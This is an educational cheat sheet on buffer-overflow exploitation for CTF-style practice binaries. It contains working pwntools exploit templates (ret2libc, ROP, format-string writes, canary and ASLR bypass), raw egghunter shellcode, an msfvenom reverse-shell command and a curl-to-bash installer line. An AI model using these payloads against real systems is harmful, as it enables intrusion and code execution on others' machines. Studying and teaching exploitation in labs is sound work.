# Buffer Overflow

## Overview

Buffer overflows occur when a program writes more data to a buffer than it can hold, overwriting adjacent memory. This can lead to crashes, data corruption, or arbitrary code execution.

## Types of Buffer Overflows

### Stack-Based Buffer Overflow

```
+------------------+  High Memory
|   Command Args   |
+------------------+
|  Environment     |
+------------------+
|     Stack        |  <- Grows downward
|  +------------+  |
|  | Parameters |  |
|  +------------+  |
|  | Return Addr|  |  <- TARGET
|  +------------+  |
|  | Saved EBP  |  |
|  +------------+  |
|  | Local Vars |  |  <- Overflow writes upward from here
|  +------------+  |
+------------------+
|      Heap        |  <- Grows upward
+------------------+
|      BSS         |
+------------------+
|      Data        |
+------------------+
|      Text        |
+------------------+  Low Memory
```
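To make the layout concrete, here is a minimal simulation rather than real process memory. A `bytearray` stands in for one 32-bit stack frame, and the names `BUF_SIZE`, `make_frame`, `unchecked_copy`, and `read_ret` are hypothetical, as are the sample addresses. It sketches how a copy with no bounds check runs past the local buffer and into the saved EBP and return address.

```python
import struct

BUF_SIZE = 16  # hypothetical size of the local buffer


def make_frame(saved_ebp=0xBFFFF6C8, ret_addr=0x08048456):
    """Model a frame from low to high addresses: buffer, saved EBP, return address."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<II", saved_ebp, ret_addr))


def unchecked_copy(frame, data):
    """Copy like strcpy(): nothing compares len(data) with BUF_SIZE."""
    frame[0:len(data)] = data
    return frame


def read_ret(frame):
    """Read the 4-byte return address stored above the saved EBP."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


frame = make_frame()
unchecked_copy(frame, b"A" * BUF_SIZE)            # fits: return address untouched
print(hex(read_ret(frame)))                       # 0x8048456

overflow = b"A" * (BUF_SIZE + 4) + struct.pack("<I", 0xDEADBEEF)
unchecked_copy(frame, overflow)                   # 8 bytes too long
print(hex(read_ret(frame)))                       # 0xdeadbeef
```

The distance from the start of the buffer to the return address (here `BUF_SIZE + 4`) is the "offset" that the pattern tools later on this page are used to find.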

### Heap-Based Buffer Overflow

* Heap overflows corrupt heap metadata or adjacent heap objects.
* They can lead to arbitrary write primitives.
* They are more complex to exploit than stack overflows but still dangerous.
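The metadata corruption described above can be sketched with a toy model. This is not a real allocator: `heap`, `CHUNK_A_SIZE`, `write_chunk_a`, and `chunk_b_size` are hypothetical names, and the layout (chunk A's data followed directly by chunk B's 8-byte size field) is a simplifying assumption.

```python
import struct

CHUNK_A_SIZE = 16                      # user data of chunk A: bytes 0..15
B_HEADER = CHUNK_A_SIZE                # chunk B's 8-byte size field sits right after A
heap = bytearray(CHUNK_A_SIZE + 8 + 16)
struct.pack_into("<Q", heap, B_HEADER, 0x21)   # illustrative size value for chunk B


def write_chunk_a(data):
    """Write into chunk A without checking CHUNK_A_SIZE (the bug being modelled)."""
    heap[0:len(data)] = data


def chunk_b_size():
    """Read back the size field that an allocator would trust for chunk B."""
    return struct.unpack_from("<Q", heap, B_HEADER)[0]


write_chunk_a(b"A" * CHUNK_A_SIZE)                               # in bounds
print(hex(chunk_b_size()))                                       # 0x21
write_chunk_a(b"A" * CHUNK_A_SIZE + struct.pack("<Q", 0x1000))   # 8 bytes too many
print(hex(chunk_b_size()))                                       # 0x1000
```

An allocator that later trusts the corrupted size field operates on attacker-influenced metadata, which is where the write primitives mentioned above come from.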

## Finding Buffer Overflows

### Fuzzing

```bash
# Simple fuzzing with pattern
python3 -c "print('A' * 1000)" | ./vulnerable_program

# Using AFL++
afl-fuzz -i input/ -o output/ -- ./vulnerable_program @@

# Using Boofuzz (network)
# See boofuzz documentation for protocol-specific fuzzing
```

### Pattern Creation

```bash
# Metasploit pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

# Find offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41326341

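# Python alternative (pwntools), run from the shell
python3 -c "from pwn import *; print(cyclic(1000).decode())"      # Create pattern
python3 -c "from pwn import *; print(cyclic_find(0x61616174))"    # Find offset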
```
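For readers who want to see what these tools do internally, the following is a minimal stdlib-only sketch. It is intended to mirror the uppercase, lowercase, digit scheme of the Metasploit pattern. The function names `pattern_create` and `pattern_offset` are borrowed for illustration and this is not the Metasploit implementation. It assumes a 32-bit little-endian register value.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Build a non-repeating pattern: Aa0Aa1Aa2...Aa9Ab0..."""
    triples = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        triples.append(upper + lower + digit)
        if len(triples) * 3 >= length:
            break
    return "".join(triples)[:length].encode()


def pattern_offset(value, length=8192):
    """Return the offset of a 32-bit register value in the pattern, or -1."""
    needle = struct.pack("<I", value)  # registers hold the bytes little-endian
    return pattern_create(length).find(needle)


print(pattern_create(12))               # b'Aa0Aa1Aa2Aa3'
print(pattern_offset(0x41326341))       # 66
```

The value `0x41326341` corresponds to the bytes `Ac2A`, which first appear 66 bytes into the pattern, so 66 bytes of padding would precede the overwritten value in that case.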

### GDB Analysis

```bash
# Run program in GDB
gdb ./vulnerable

# Set breakpoint at vulnerable function
b vulnerable_function

# Run with input
run $(python3 -c "print('A'*100)")

# Continue past the breakpoint until the crash
continue

# Check registers after crash
info registers

# Examine stack
x/100x $esp

# Check memory protections (GEF/pwndbg/PEDA command, not stock GDB)
checksec
```

## Exploitation Techniques

### Classic Return Address Overwrite

```python
#!/usr/bin/env python3
from pwn import *

# Configuration
binary = './vulnerable'
elf = ELF(binary)

# Calculate offset (found via pattern)
offset = 76

# Build payload
payload = b'A' * offset           # Padding to reach return address
payload += p32(0xdeadbeef)        # Overwrite return address

# Run exploit
p = process(binary)
p.sendline(payload)
p.interactive()
```
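The `p32()` call above packs an integer as four little-endian bytes. A stdlib-only sketch of the same payload layout is shown here for readers without pwntools. `build_payload` is a hypothetical helper, and the offset and address are the placeholder values from the example.

```python
import struct


def build_payload(offset, ret_addr, filler=b"A"):
    """Padding up to the return address, then the new address in little-endian."""
    return filler * offset + struct.pack("<I", ret_addr)


payload = build_payload(76, 0xDEADBEEF)
print(len(payload))          # 80
print(payload[-4:].hex())    # efbeadde
```

The byte order matters: x86 stores the least significant byte first, so `0xdeadbeef` appears in the payload as `ef be ad de`.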

### Return to Shellcode

```python
#!/usr/bin/env python3
from pwn import *

binary = './vulnerable'
offset = 76

context.arch = 'i386'

# Shellcode (Linux x86 execve /bin/sh)
shellcode = asm(shellcraft.sh())

# NOP sled + shellcode go after the return address, so their size is not limited by offset
nop_sled = b'\x90' * 100
shellcode_addr = 0xbffff000  # Address inside the NOP sled (find via debugging)

payload = b'A' * offset          # Padding to reach return address
payload += p32(shellcode_addr)   # Overwrite return address
payload += nop_sled
payload += shellcode

p = process(binary)
p.sendline(payload)
p.interactive()
```

### Return to libc (ret2libc)

```python
#!/usr/bin/env python3
from pwn import *

# Bypass NX (non-executable stack) by returning to libc functions

binary = './vulnerable'
elf = ELF(binary)
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

# Find libc base (with ASLR disabled or leaked)
# For demonstration, ASLR disabled
libc_base = 0xf7c00000

# Calculate addresses
system_addr = libc_base + libc.symbols['system']
exit_addr = libc_base + libc.symbols['exit']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

offset = 76

# Payload: system("/bin/sh")
payload = b'A' * offset
payload += p32(system_addr)   # Return to system()
payload += p32(exit_addr)     # Return address after system (clean exit)
payload += p32(binsh_addr)    # Argument to system()

p = process(binary)
p.sendline(payload)
p.interactive()
```

### Return Oriented Programming (ROP)

```python
#!/usr/bin/env python3
from pwn import *

# ROP chains use existing code gadgets to bypass DEP/NX

binary = './vulnerable'
elf = ELF(binary)
rop = ROP(elf)

# Find gadgets
# ropper -f ./vulnerable
# ROPgadget --binary ./vulnerable

# Example: mprotect to make stack executable, then jump to shellcode
# Or: execve("/bin/sh", NULL, NULL)

offset = 76

# Using pwntools ROP; rop.raw(<address>) can append a manually chosen gadget if needed
rop.call(elf.plt['puts'], [elf.got['puts']])  # Leak libc address
rop.call(elf.symbols['main'])  # Return to main for second stage

payload = b'A' * offset + rop.chain()

p = process(binary)
p.sendline(payload)

# Parse leaked address
leaked = u32(p.recv(4))
log.info(f"Leaked puts: {hex(leaked)}")
```

### 64-bit Exploitation

```python
#!/usr/bin/env python3
from pwn import *

# 64-bit Linux (System V AMD64) passes arguments in registers, not on the stack
# First 6 args: RDI, RSI, RDX, RCX, R8, R9
# Need gadgets to control these registers

binary = './vulnerable64'
elf = ELF(binary)
rop = ROP(elf)

# Find gadgets
# pop rdi; ret
pop_rdi = 0x401234

offset = 72  # 64-bit typically has different offsets

# Call system("/bin/sh") in 64-bit
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = 0x7ffff7c00000  # Example, needs to be leaked

system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

payload = b'A' * offset
payload += p64(pop_rdi)       # pop rdi; ret
payload += p64(binsh_addr)    # /bin/sh string
payload += p64(system_addr)   # system()

p = process(binary)
p.sendline(payload)
p.interactive()
```

## Bypassing Protections

### ASLR Bypass

```python
# Address Space Layout Randomization
# Randomizes stack, heap, libraries, and sometimes binary

# Techniques:
# 1. Information leak - leak an address to calculate base
# 2. Brute force (32-bit has limited entropy)
# 3. Return to PLT (PLT addresses are fixed in non-PIE binaries)
# 4. ret2plt to leak GOT entries

# Example: Leak libc address via puts
from pwn import *

binary = './vulnerable'
elf = ELF(binary)
rop = ROP(elf)

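# Stage 1: Leak libc address
offset = 72         # Placeholder: distance to return address (find via pattern)
pop_rdi = 0x401234  # Placeholder: address of a `pop rdi; ret` gadget
payload1 = b'A' * offset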
payload1 += p64(pop_rdi)
payload1 += p64(elf.got['puts'])  # Argument: GOT entry of puts
payload1 += p64(elf.plt['puts'])  # Call puts to print address
payload1 += p64(elf.symbols['main'])  # Return to main

p = process(binary)
p.sendline(payload1)
p.recvuntil(b'...')  # Receive until leak

leaked_puts = u64(p.recv(6).ljust(8, b'\x00'))
log.info(f"Leaked puts: {hex(leaked_puts)}")

# Calculate libc base
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = leaked_puts - libc.symbols['puts']
```
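The leak-parsing and base calculation can be sketched without pwntools. `parse_leak` and `libc_base_from_leak` are hypothetical helpers, and `PUTS_OFFSET` and the sample leak bytes are made-up values for illustration, not taken from any real libc.

```python
def parse_leak(raw):
    """Turn the bytes printed by puts() into an integer address.

    puts() stops at the first null byte, so a 64-bit user-space address
    usually arrives as 6 bytes and is padded back to 8.
    """
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Subtract the symbol's offset; a valid base is page-aligned."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned: wrong libc or bad leak")
    return base


PUTS_OFFSET = 0x80E50                      # hypothetical offset of puts in libc
leak = bytes.fromhex("500ec8f7ff7f")       # hypothetical 6 leaked bytes
leaked_puts = parse_leak(leak)
print(hex(leaked_puts))                                   # 0x7ffff7c80e50
print(hex(libc_base_from_leak(leaked_puts, PUTS_OFFSET))) # 0x7ffff7c00000
```

The alignment check is a cheap sanity test: if the computed base does not end in `000`, the leak was misparsed or the local libc differs from the target's.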

### Stack Canary Bypass

```python
# Stack canaries are random values placed between local variables and the saved return address
# The program aborts (via __stack_chk_fail) if the canary has changed when the function returns

# Techniques:
# 1. Information leak to get canary value
# 2. Brute force (byte by byte in forking servers)
# 3. Overwrite only variables before canary (for different attacks)

# Example: Leak canary via format string
payload = b'%15$p'  # Leak canary position (varies)
p.sendline(payload)
canary = int(p.recv().strip(), 16)

# Then include correct canary in overflow
payload = b'A' * offset_to_canary
payload += p64(canary)
payload += b'A' * 8  # Saved RBP
payload += p64(target_address)
```
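When hunting for the right `%N$p` position, it helps to sanity-check each leaked value. The sketch below assumes Linux with glibc, where the canary's least significant byte is zero. `parse_canary` is a hypothetical helper and the sample values are invented.

```python
def parse_canary(line):
    """Parse '%p' output and reject values that cannot be a glibc canary."""
    value = int(line.decode().strip(), 16)
    if value & 0xFF != 0:
        raise ValueError(f"{hex(value)} does not end in a null byte")
    return value


print(hex(parse_canary(b"0x3a5f9c1e7d204b00\n")))   # 0x3a5f9c1e7d204b00

try:
    parse_canary(b"0x7ffff7dd18e0\n")               # looks like a pointer instead
except ValueError as err:
    print("rejected:", err)
```

A value that passes this check is only a candidate. Stack and library pointers can also end in `00`, so the position still needs confirming in a debugger.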

### NX/DEP Bypass

```bash
# Non-Executable stack prevents shellcode execution
# Use return-to-libc or ROP instead

# Check if NX is enabled
checksec ./vulnerable
# Output: NX enabled

# Bypass options:
# 1. ret2libc (call existing functions)
# 2. ROP (chain gadgets)
# 3. ret2plt
# 4. mprotect() to make memory executable
```
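The NX status that `checksec` reports for the stack comes from the `PT_GNU_STACK` program header. The following is a minimal sketch of that one check, not a replacement for `checksec`. The function name `stack_is_executable` is hypothetical, and the parser reads only the ELF fields it needs.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that carries the stack permissions
PF_X = 0x1                 # "executable" bit in p_flags


def stack_is_executable(image):
    """Return True/False from PT_GNU_STACK, or None if the header is absent."""
    if image[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is_64bit = image[4] == 2                   # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if image[5] == 1 else ">"     # EI_DATA: 1 = little-endian
    if is_64bit:
        (phoff,) = struct.unpack_from(endian + "Q", image, 0x20)
        phentsize, phnum = struct.unpack_from(endian + "HH", image, 0x36)
        flags_at = 4    # p_flags follows p_type in Elf64_Phdr
    else:
        (phoff,) = struct.unpack_from(endian + "I", image, 0x1C)
        phentsize, phnum = struct.unpack_from(endian + "HH", image, 0x2A)
        flags_at = 24   # p_flags is the seventh field in Elf32_Phdr
    for i in range(phnum):
        entry = phoff + i * phentsize
        (p_type,) = struct.unpack_from(endian + "I", image, entry)
        if p_type == PT_GNU_STACK:
            (p_flags,) = struct.unpack_from(endian + "I", image, entry + flags_at)
            return bool(p_flags & PF_X)
    return None
```

A typical call would be `stack_is_executable(open('./vulnerable', 'rb').read())`. A result of `False` corresponds to "NX enabled" for the stack.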

### PIE Bypass

```python
# Position Independent Executable
# Binary loaded at random base address

# Need to leak binary base address
# Or use partial overwrite (only overwrite lower bytes)

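# Partial overwrite example: the low 12 bits of an address are never randomized
# Overwriting the last 2 bytes leaves 4 random bits, so it succeeds about 1 time in 16
payload = b'A' * offset
payload += b'\x00\x12'  # Only change last 2 bytes to 0x1200 (send without a trailing newline)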

# Or leak binary address from stack
```

## Format String Attacks

```python
# Format string bugs can read/write arbitrary memory

# Reading memory
payload = b'AAAA' + b'.%x' * 20  # Leak stack values
payload = b'%7$s' + p64(address)  # Read from specific address

# Writing memory (overwrite GOT entry)
# Write small value
payload = b'%100c%7$n' + p64(target_addr)  # Write 100 to target_addr

# Write larger values (byte by byte)
from pwn import fmtstr_payload
writes = {target_addr: desired_value}
payload = fmtstr_payload(offset, writes)  # offset = stack position of the format string
```
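The positional index used in `%7$s` and `%7$n` has to be found first. One way is to send the `AAAA.%x.%x...` probe shown above and look for the marker in the output. The sketch below does that lookup. `find_fmt_offset` is a hypothetical helper, the sample output is invented, and it assumes the marker is aligned to a stack slot and printed as a 32-bit little-endian value.

```python
def find_fmt_offset(output, marker=b"AAAA", sep=b"."):
    """Return the 1-based argument position whose value equals the marker."""
    wanted = marker[::-1].hex()           # b'ABCD' is read back as 0x44434241
    fields = output.split(sep)[1:]        # drop the echoed marker itself
    for position, field in enumerate(fields, start=1):
        if field.strip().decode(errors="replace").lower() == wanted:
            return position
    return None


sample = b"AAAA.f7fc1000.0.41414141.2e78252e"   # hypothetical program output
print(find_fmt_offset(sample))                  # 3
```

With this sample the format string itself starts at the third argument, so `%3$x` would print the marker directly.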

## Windows Buffer Overflows

### Finding Bad Characters

```python
# Bad chars break the payload (null bytes, newlines, etc.)
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
    b"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
    # ... continue through 0xff
)
# Send and check which bytes are mangled in memory
```
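Comparing the sent bytes against a memory dump by eye is error-prone, so a small helper can do it. This is a sketch with hypothetical names (`all_bytes`, `first_bad_char`). It assumes the dump has already been copied out of the debugger as raw bytes.

```python
def all_bytes(exclude=b"\x00"):
    """Every byte value 0x00-0xff except those already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent, in_memory):
    """Return the first byte that was altered or that truncated the buffer."""
    for expected, actual in zip(sent, in_memory):
        if expected != actual:
            return expected
    if len(in_memory) < len(sent):
        return sent[len(in_memory)]       # buffer was cut off at this byte
    return None


sent = all_bytes()
dump = sent[:9]                           # hypothetical dump: copy stopped before 0x0a
print(hex(first_bad_char(sent, dump)))    # 0xa
```

Only the first mismatch is reliable, because everything after a bad character may be shifted or missing. Add the reported byte to `exclude`, resend, and repeat until the function returns `None`.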

### JMP ESP Technique

```python
# Windows: find JMP ESP in loaded DLLs
# Use mona.py in Immunity Debugger

# !mona jmp -r esp -cpb "\x00\x0a\x0d"

# Build payload
import struct

offset = 2003
jmp_esp = struct.pack('<I', 0x625011af)  # Address of JMP ESP
nops = b'\x90' * 16

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f python -b "\x00\x0a\x0d"
shellcode = b"..."

payload = b'A' * offset
payload += jmp_esp
payload += nops
payload += shellcode
```

### SEH Overwrite

```python
# Structured Exception Handler overwrite
# Windows-specific technique

# Find POP POP RET gadget
# !mona seh -cpb "\x00\x0a\x0d"

# Payload structure:
# [buffer][nSEH][SEH][shellcode]
# nSEH: short jump over SEH to shellcode
# SEH: POP POP RET gadget

import struct

nseh = b'\xeb\x06\x90\x90'  # JMP short +6 (skips the 2 NOPs and the 4-byte SEH)
seh = struct.pack('<I', 0x10001234)  # POP POP RET

payload = b'A' * offset
payload += nseh
payload += seh
payload += b'\x90' * 16
payload += shellcode
```
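The `+6` in the nSEH jump is easy to get wrong, so here is a small sketch of the arithmetic. `short_jmp_target` is a hypothetical helper, and offsets are counted from the start of the nSEH field.

```python
def short_jmp_target(instr_offset, instr):
    """Where a 2-byte x86 short jump (opcode 0xEB) lands.

    The displacement is signed and relative to the end of the instruction.
    """
    if instr[0] != 0xEB:
        raise ValueError("not a short JMP")
    displacement = int.from_bytes(instr[1:2], "little", signed=True)
    return instr_offset + 2 + displacement


# Layout after the padding: nSEH at 0..3, SEH at 4..7, NOPs/shellcode from 8
print(short_jmp_target(0, b"\xeb\x06\x90\x90"))   # 8
```

Execution resumes at offset 8, the first byte after the SEH pointer, which is where the NOPs and shellcode begin in the payload above.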

### Egghunter

```python
# Egghunter: small shellcode that searches memory for larger payload
# Useful when buffer space is limited

# Egg: unique 4-byte marker, repeated twice before main shellcode
egg = b'w00t'

# Egghunter shellcode (~32 bytes)
egghunter = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# First stage (small buffer)
payload1 = b'A' * offset
payload1 += jmp_esp
payload1 += egghunter

# Second stage (placed elsewhere in memory)
payload2 = egg + egg + main_shellcode
```
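The reason the tag is written twice can be shown with a toy search over a byte string. This is a simulation of the idea only, not the egghunter itself. `hunt` is a hypothetical function and the memory contents are invented.

```python
def hunt(memory, tag=b"w00t"):
    """Return the index just past the doubled tag, or None if it is absent."""
    index = memory.find(tag + tag)
    return None if index < 0 else index + 2 * len(tag)


memory = (
    b"\x00" * 10
    + b"\xb8w00t"          # the hunter's own 'mov eax, "w00t"' holds one copy
    + b"\x90" * 5
    + b"w00tw00t"          # the real egg: tag repeated twice
    + b"PAYLOAD"
)
start = hunt(memory)
print(start, memory[start:])   # 28 b'PAYLOAD'
```

Searching for a single tag would match the copy embedded in the hunter at index 11. Requiring two consecutive copies skips it and lands on the second-stage payload.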

## Useful Tools

```bash
# Pwntools (Python)
pip install pwntools

# GDB + GEF/PEDA/pwndbg
# GEF
bash -c "$(curl -fsSL https://gef.blah.cat/sh)"

# pwndbg
git clone https://github.com/pwndbg/pwndbg
cd pwndbg && ./setup.sh

# ROPgadget
pip install ropgadget
ROPgadget --binary ./vulnerable

# Ropper
pip install ropper
ropper -f ./vulnerable

# checksec
checksec --file=./vulnerable

# one_gadget (find execve gadgets in libc)
gem install one_gadget
one_gadget /lib/x86_64-linux-gnu/libc.so.6

# mona.py (Windows/Immunity Debugger)
# https://github.com/corelan/mona
```

## Debugging Commands

```bash
# GDB with pwndbg
gdb ./vulnerable
pwndbg> checksec
pwndbg> cyclic 200
pwndbg> run
pwndbg> cyclic -l $rsp

# GDB with GEF
gef> pattern create 200
gef> pattern search

# Find string in binary
strings -a -t x ./vulnerable | grep "/bin/sh"

# Find gadgets
objdump -d ./vulnerable | grep -A2 "pop"
```

## Practice Resources

* [Protostar](https://exploit.education/protostar/)
* [Phoenix](https://exploit.education/phoenix/)
* [ROP Emporium](https://ropemporium.com/)
* [pwnable.kr](http://pwnable.kr/)
* [pwnable.tw](https://pwnable.tw/)
* [Nightmare Course](https://guyinatuxedo.github.io/)
* [LiveOverflow Binary Exploitation](https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN)


